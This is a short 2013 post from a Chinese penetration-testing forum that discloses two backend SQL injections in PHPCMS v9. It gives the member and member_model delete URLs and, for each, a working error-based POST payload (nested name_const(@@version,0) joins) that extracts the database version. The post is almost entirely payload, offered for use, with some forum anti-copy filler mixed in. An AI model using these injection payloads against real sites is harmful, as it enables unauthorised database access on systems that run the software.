中国网络渗透测试联盟

标题: phpcms两处后台的SQL注入 [打印本页]
作者: admin    时间: 2013-7-27 18:33
标题: phpcms两处后台的SQL注入
(一):
! q6 C  z9 ~4 D/ Y

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member&a=delete&pc_hash=GlyB7G&id

post

userid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)


6 L  p/ X- E9 Y6 Y- `6 s; M7 Z+ F& t5 ], z7 A$ C
  n9 D3 [; X6 J

(二):

http://www.0day5.com/phpcmsv9/index.php?m=member&c=member_model&a=delete&pc_hash=GlyB7G

post

modelid=(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2